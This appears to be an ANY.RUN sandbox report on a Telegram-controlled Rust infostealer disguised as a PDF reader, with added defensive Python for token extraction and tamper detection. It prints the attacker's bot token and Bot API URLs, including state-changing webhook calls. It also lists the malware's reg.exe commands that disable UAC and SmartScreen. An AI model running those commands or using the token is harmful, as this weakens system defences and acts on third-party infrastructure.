File name:

1.bin

Full analysis: https://app.any.run/tasks/a0661ad7-11cd-4561-959d-6febb99048f2
Verdict: Malicious activity
Analysis date: May 16, 2025, 22:29:35
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
telegram
ims-api
generic
rust
arch-doc
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 3 sections
MD5:

CA7468D34BC9F8E5729A90F62D12B6A4

SHA1:

2A3F1E67AFE9D9B3B92A23F28759FD5B4A1234A1

SHA256:

38D4DE2B555AEE0F6862BC4E236D09F2FEC55613221BE31E52C51A28F7CA2B48

SSDEEP:

98304:uki4srnUPGi3XOF78hP7R4OalRQIVNKTgqXYkWotDAlvW5DRnBEcpwsfpkagjgaR:4m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 1.bin.exe (PID: 5588)
    • Reads security settings of Internet Explorer

      • 1.bin.exe (PID: 5588)
    • Reads the date of Windows installation

      • 1.bin.exe (PID: 5588)
    • Starts CMD.EXE for commands execution

      • 1.bin.exe (PID: 5588)
    • Executing commands from a ".bat" file

      • 1.bin.exe (PID: 5588)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 5176)
    • The executable file from the user directory is run by the CMD process

      • gemini.exe (PID: 4988)
    • The process checks if it is being run in the virtual environment

      • gemini.exe (PID: 4988)
    • Searches for installed software

      • gemini.exe (PID: 4988)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • gemini.exe (PID: 4988)
    • There is functionality for taking screenshot (YARA)

      • gemini.exe (PID: 4988)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • gemini.exe (PID: 4988)
  • INFO

    • Reads the computer name

      • 1.bin.exe (PID: 5588)
      • gemini.exe (PID: 4988)
    • Creates files or folders in the user directory

      • 1.bin.exe (PID: 5588)
    • Create files in a temporary directory

      • 1.bin.exe (PID: 5588)
      • gemini.exe (PID: 4988)
    • The sample compiled with english language support

      • 1.bin.exe (PID: 5588)
    • Checks supported languages

      • 1.bin.exe (PID: 5588)
      • gemini.exe (PID: 4988)
    • Checks proxy server information

      • gemini.exe (PID: 4988)
    • Process checks computer location settings

      • 1.bin.exe (PID: 5588)
    • Reads the software policy settings

      • gemini.exe (PID: 4988)
    • Attempting to use instant messaging service

      • gemini.exe (PID: 4988)
    • Application based on Rust

      • gemini.exe (PID: 4988)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process: (4988) gemini.exe

Telegram-Tokens (1)
7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og

Telegram-Info-Links
Get info about bot: https://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getMe
Get incoming updates: https://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getUpdates
Get webhook: https://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getWebhookInfo
Delete webhook: https://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook
Drop incoming updates: https://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook?drop_pending_updates=true

Telegram-Requests
Token: 7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
End-Point: sendMessage
Args:

Telegram-Responses
Four distinct responses were captured; they are listed once, ordered by message_id. Every response has ok: true, from: {id: 7730596169, is_bot: true, first_name: Myboot, username: KERTYHUBOT} and chat: {id: 7656319589, first_name: Werty, username: WertyFeart, type: private}. Russian strings are kept verbatim with an English translation in parentheses.

message_id: 98
date: 1747434587 (2025-05-16 22:29:47 UTC)
text: Архивирую Chrome... ("Archiving Chrome...")

message_id: 101
date: 1747434594 (2025-05-16 22:29:54 UTC)
document:
  file_name: Chrome_chunk_1.part
  file_id: BQACAgIAAxkDAANlaCe8YjLCB4wjTBK0uF-gvQNj_ywAAj-HAAIWZzhJEDN74GXDb_o2BA
  file_unique_id: AgADP4cAAhZnOEk
  file_size: 1686952
caption: Chrome часть 1/1 ("Chrome part 1/1")

message_id: 102
date: 1747434594 (2025-05-16 22:29:54 UTC)
text: Часть 1 успешно отправлена ("Part 1 sent successfully")

message_id: 103
date: 1747434594 (2025-05-16 22:29:54 UTC)
text: Архивирую Edge... ("Archiving Edge...")
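The following Python is an added example, not code from the ANY.RUN report or from the sample. It shows how a responder can pull a Bot API token out of extracted strings (using the `<bot id>:<35 characters>` shape the token above has), derive the same Bot API URLs listed under Telegram-Info-Links, and rebuild an exfiltration timeline from captured Bot API responses. The sample strings and responses are constructed from values shown above (the token, bot and chat identities, message_ids, dates, file name and size); the decoy string and the ok: false entry are constructed failure cases.

```python
"""Added example: Telegram bot token triage and exfil timeline from captured
Bot API responses. Sample inputs are constructed from the report's values."""
import re
from datetime import datetime, timezone

# Bot tokens look like "<8-10 digit bot id>:<35 char secret>". The lookarounds
# stop the digits being cut out of a longer number and the secret out of a
# longer word, but a leading "bot" (as in the API URL path) is still accepted.
TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")

# The endpoints the report enumerates under Telegram-Info-Links.
INFO_ENDPOINTS = {
    "getMe": "getMe",
    "getUpdates": "getUpdates",
    "getWebhookInfo": "getWebhookInfo",
    "deleteWebhook": "deleteWebhook",
    "dropPendingUpdates": "deleteWebhook?drop_pending_updates=true",
}


def find_tokens(strings):
    """Return unique bot tokens found in an iterable of strings
    (e.g. `strings` output or a memory dump split on newlines)."""
    found = []
    for s in strings:
        for m in TOKEN_RE.finditer(s):
            tok = f"{m.group(1)}:{m.group(2)}"
            if tok not in found:
                found.append(tok)
    return found


def info_links(token):
    """Bot API URLs for a token, mirroring Telegram-Info-Links."""
    return {k: f"https://api.telegram.org/bot{token}/{v}" for k, v in INFO_ENDPOINTS.items()}


def _utc(ts):
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()


def exfil_timeline(responses):
    """Turn captured Bot API responses (sendMessage/sendDocument results) into
    an ordered list of what the bot delivered and to which chat. Responses
    with ok=false carry no message and are skipped."""
    events = []
    for r in responses:
        if not r.get("ok"):
            continue
        msg = r["result"]
        entry = {
            "message_id": msg["message_id"],
            "utc": _utc(msg["date"]),
            "bot": msg["from"].get("username"),
            "chat_id": msg["chat"]["id"],
            "operator": msg["chat"].get("username"),
        }
        if "document" in msg:
            d = msg["document"]
            entry["kind"] = "document"
            entry["bytes"] = d["file_size"]
            entry["detail"] = f'{d["file_name"]} ({d["file_size"]} bytes) caption={msg.get("caption")!r}'
        else:
            entry["kind"] = "text"
            entry["bytes"] = 0
            entry["detail"] = msg.get("text", "")
        events.append(entry)
    return sorted(events, key=lambda e: e["message_id"])


def exfil_summary(timeline):
    """Totals a responder wants first: bytes delivered, file names, and the
    (chat id, username) pairs that received them."""
    return {
        "bytes": sum(e["bytes"] for e in timeline),
        "files": [e["detail"].split(" (")[0] for e in timeline if e["kind"] == "document"],
        "chats": sorted({(e["chat_id"], e["operator"]) for e in timeline}),
    }


# Constructed sample strings: the report's token inside a Bot API URL, a decoy
# that has the right shape but a secret of the wrong length, and a path.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/sendMessage",
    "1234567890:notatokenbecausetoo-short",
    r"C:\Users\admin\AppData\Roaming\gemini.exe",
]

# Constructed sample responses mirroring the four distinct messages captured
# in the report, deliberately out of order, plus one constructed failure.
_BOT = {"id": 7730596169, "is_bot": True, "first_name": "Myboot", "username": "KERTYHUBOT"}
_CHAT = {"id": 7656319589, "first_name": "Werty", "username": "WertyFeart", "type": "private"}
SAMPLE_RESPONSES = [
    {"ok": True, "result": {"message_id": 103, "from": _BOT, "chat": _CHAT, "date": 1747434594, "text": "Архивирую Edge..."}},
    {"ok": True, "result": {"message_id": 101, "from": _BOT, "chat": _CHAT, "date": 1747434594,
                            "document": {"file_name": "Chrome_chunk_1.part",
                                         "file_id": "BQACAgIAAxkDAANlaCe8YjLCB4wjTBK0uF-gvQNj_ywAAj-HAAIWZzhJEDN74GXDb_o2BA",
                                         "file_unique_id": "AgADP4cAAhZnOEk", "file_size": 1686952},
                            "caption": "Chrome часть 1/1"}},
    {"ok": True, "result": {"message_id": 98, "from": _BOT, "chat": _CHAT, "date": 1747434587, "text": "Архивирую Chrome..."}},
    {"ok": True, "result": {"message_id": 102, "from": _BOT, "chat": _CHAT, "date": 1747434594, "text": "Часть 1 успешно отправлена"}},
    {"ok": False, "error_code": 429, "description": "constructed: Too Many Requests"},
]

if __name__ == "__main__":
    for tok in find_tokens(SAMPLE_STRINGS):
        print("token:", tok)
        for name, url in info_links(tok).items():
            print(f"  {name}: {url}")
    timeline = exfil_timeline(SAMPLE_RESPONSES)
    for e in timeline:
        print(e["utc"], e["message_id"], e["kind"], "->", e["chat_id"], e["detail"])
    print(exfil_summary(timeline))
```

The getMe and getWebhookInfo links are read-only and identify the bot and any webhook the operator registered; deleteWebhook and the drop_pending_updates variant change the state of a bot you do not own, so treat them as an active measure against attacker infrastructure and follow your organisation's rules before using them.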
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (87)
.exe | Generic Win/DOS Executable (6.4)
.exe | DOS Executable Generic (6.4)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2019:07:30 08:52:21+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, Large address aware
PEType: PE32+
LinkerVersion: 2.5
CodeSize: 2027520
InitializedDataSize: 16384
UninitializedDataSize: 102400
EntryPoint: 0x207630
OSVersion: 4
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
FileVersionNumber: 4.16.3.12
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: Debug, Pre-release, Private build
FileOS: Windows 16-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
FileVersion: 4.16.3.12
ProductVersion: 4.16.3
ProductName: Microsoft PDF Reader Document
OriginalFileName: Reader.exe
InternalName: Reader
FileDescription: Программный продукт ("Software product")
CompanyName: Microsoft Corporation, inc.
LegalTrademarks: Microsoft Corp., inc.
LegalCopyright: Microsoft Corporation, inc.
PrivateBuild: 1679
SpecialBuild: 4.16.3.12
No data.
screenshot
All screenshots are available in the full report
Total processes
140
Monitored processes
13
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start
1.bin.exe
cmd.exe (no specs)
conhost.exe (no specs)
reg.exe (no specs), 7 instances
gemini.exe
sppextcomobj.exe (no specs)
slui.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 516
CMD: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d 0 /f
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 1056
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID: 1628
CMD: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d 0 /f
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 2236
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 2432
CMD: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Ribbon" /v "MinimizedStateTabletModeOff" /t REG_DWORD /d 1 /f
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 4896
CMD: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "ShellSmartScreenLevel" /t REG_SZ /d "" /f
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 4988
CMD: "C:\Users\admin\AppData\Roaming\gemini.exe"
Path: C:\Users\admin\AppData\Roaming\gemini.exe
Parent process: cmd.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\roaming\gemini.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 5048
CMD: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 5176
CMD: "C:\WINDOWS\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\BEAE.tmp\BEBF.tmp\BEC0.bat C:\Users\admin\AppData\Local\Temp\1.bin.exe"
Path: C:\Windows\System32\cmd.exe
Parent process: 1.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
PID: 5588
CMD: "C:\Users\admin\AppData\Local\Temp\1.bin.exe"
Path: C:\Users\admin\AppData\Local\Temp\1.bin.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\1.bin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events
4 894
Read events
4 893
Write events
1
Delete events
0

Modification events

(PID) Process: (2432) reg.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon
Operation: write
Name: MinimizedStateTabletModeOff
Value: 1
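The following Python is an added example, not code from the ANY.RUN report or from the sample. It runs a detection pass over process-creation events, flags reg.exe writes to UAC and SmartScreen policy values, and uses the recorded exit code and integrity level to say whether each write took effect. In the run above, all four HKLM writes came from a MEDIUM-integrity cmd.exe and exited with code 1, while the single HKCU write (Ribbon\MinimizedStateTabletModeOff) exited 0 and is the only write event recorded; the "applied" flag below reproduces that. The events are constructed from the PIDs, command lines, integrity levels and exit codes shown above, plus one hypothetical HIGH-integrity run (PID 9999) that is not in the report and is there to show the success case. The ATT&CK mapping in TAMPER_VALUES is my assumption.

```python
"""Added example: flag reg.exe writes that weaken UAC/SmartScreen and judge
from exit code and integrity level whether they took effect. Sample events are
constructed from the report's process table plus one hypothetical run."""
import re

# (normalised key, value name) -> (effect, ATT&CK technique). The technique
# mapping is an assumption by the editor, not something the report states.
TAMPER_VALUES = {
    (r"hklm\software\microsoft\windows\currentversion\policies\system", "enablelua"):
        ("UAC disabled", "T1562.001"),
    (r"hklm\software\microsoft\windows\currentversion\policies\system", "promptonsecuredesktop"):
        ("UAC prompt moved off the secure desktop", "T1562.001"),
    (r"hklm\software\policies\microsoft\windows\system", "enablesmartscreen"):
        ("SmartScreen disabled by policy", "T1562.001"),
    (r"hklm\software\policies\microsoft\windows\system", "shellsmartscreenlevel"):
        ("SmartScreen level cleared", "T1562.001"),
}

# reg add <key> [/v <name>] [/t <type>] [/d <data>] ...; each argument may be
# quoted ("" is a legal empty /d, as the ShellSmartScreenLevel command shows).
REG_ADD_RE = re.compile(
    r'\breg(?:\.exe)?\s+add\s+(?:"(?P<qkey>[^"]+)"|(?P<key>\S+))'
    r'(?:\s+/v\s+(?:"(?P<qname>[^"]*)"|(?P<name>\S+)))?'
    r'(?:\s+/t\s+(?P<type>\S+))?'
    r'(?:\s+/d\s+(?:"(?P<qdata>[^"]*)"|(?P<data>\S+)))?',
    re.IGNORECASE,
)


def _norm_key(key):
    """Lower-case and collapse long hive names so HKLM and HKEY_LOCAL_MACHINE
    spellings land on the same dictionary key."""
    k = key.strip().lower()
    for long, short in (("hkey_local_machine", "hklm"), ("hkey_current_user", "hkcu")):
        if k.startswith(long):
            k = short + k[len(long):]
    return k


def parse_reg_add(cmdline):
    """Return {key, name, type, data} for a `reg add` command line, else None."""
    m = REG_ADD_RE.search(cmdline)
    if not m:
        return None
    name = m.group("qname") if m.group("qname") is not None else m.group("name")
    data = m.group("qdata") if m.group("qdata") is not None else m.group("data")
    return {
        "key": _norm_key(m.group("qkey") or m.group("key")),
        "name": (name or "").lower(),
        "type": (m.group("type") or "").upper(),
        "data": data,
    }


def analyze(events):
    """One finding per event that writes a value in TAMPER_VALUES. 'applied'
    follows reg.exe's exit code (0 success, non-zero failure); the note calls
    out HKLM writes from a non-elevated process, which are expected to fail."""
    findings = []
    for ev in events:
        parsed = parse_reg_add(ev["cmdline"])
        if not parsed:
            continue
        hit = TAMPER_VALUES.get((parsed["key"], parsed["name"]))
        if not hit:
            continue
        effect, technique = hit
        elevated = ev["integrity"].upper() in ("HIGH", "SYSTEM")
        findings.append({
            "pid": ev["pid"],
            "parent": ev["parent"],
            "value": parsed["key"] + "\\" + parsed["name"],
            "data": parsed["data"],
            "effect": effect,
            "technique": technique,
            "applied": ev["exit_code"] == 0,
            "note": ("HKLM write from a non-elevated process; expected to fail"
                     if parsed["key"].startswith("hklm") and not elevated else ""),
        })
    return findings


# Constructed from the report's process table (PID, parent, integrity, exit code,
# command line). PID 9999 is hypothetical and not in the report.
SAMPLE_EVENTS = [
    {"pid": 516, "parent": "cmd.exe", "integrity": "MEDIUM", "exit_code": 1,
     "cmdline": r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d 0 /f'},
    {"pid": 1628, "parent": "cmd.exe", "integrity": "MEDIUM", "exit_code": 1,
     "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d 0 /f'},
    {"pid": 2432, "parent": "cmd.exe", "integrity": "MEDIUM", "exit_code": 0,
     "cmdline": r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Ribbon" /v "MinimizedStateTabletModeOff" /t REG_DWORD /d 1 /f'},
    {"pid": 4896, "parent": "cmd.exe", "integrity": "MEDIUM", "exit_code": 1,
     "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "ShellSmartScreenLevel" /t REG_SZ /d "" /f'},
    {"pid": 5048, "parent": "cmd.exe", "integrity": "MEDIUM", "exit_code": 1,
     "cmdline": r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f'},
    {"pid": 9999, "parent": "cmd.exe", "integrity": "HIGH", "exit_code": 0,  # hypothetical elevated run
     "cmdline": r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f'},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        state = "APPLIED" if f["applied"] else "attempted, failed"
        print(f'pid {f["pid"]} ({f["parent"]}): {f["effect"]} [{f["technique"]}] {state} {f["note"]}')
```

Alerting on the attempt rather than only on the resulting registry write matters here: the sandbox recorded just one write event (the harmless HKCU Ribbon value), so a rule that keys on successful policy changes would have missed all four defence-tampering attempts.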
Executable files
1
Suspicious files
2
Text files
6
Unknown types
0

Dropped files

PID | Process | Filename | MD5 | SHA256
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_profile.zip | | 
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_3.part | | 
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_2.part | | 
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_1.part | | 
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_4.part | | 
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_5.part | | 
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_6.part | | 
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_7.part | | 
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_8.part | | 
4988 | gemini.exe | C:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_9.part | | 
(MD5 and SHA256 columns are empty in the report for all dropped files.)
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
48
DNS requests
15
Threats
62

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.179:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2284
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2284
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.179:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
4988
gemini.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
whitelisted
4988
gemini.exe
149.154.167.99:443
core.telegram.org
Telegram Messenger Inc
GB
whitelisted
6544
svchost.exe
40.126.32.140:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2284
SIHClient.exe
4.245.163.56:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.184.238
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.48.23.179
  • 23.48.23.174
  • 23.48.23.161
  • 23.48.23.188
  • 23.48.23.173
  • 23.48.23.180
  • 23.48.23.166
  • 23.48.23.163
  • 23.48.23.168
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
api.telegram.org
  • 149.154.167.220
whitelisted
core.telegram.org
  • 149.154.167.99
whitelisted
login.live.com
  • 40.126.32.140
  • 40.126.32.133
  • 40.126.32.72
  • 40.126.32.136
  • 20.190.160.130
  • 20.190.160.14
  • 20.190.160.128
  • 40.126.32.74
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.69.42.241
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
4988
gemini.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
No debug info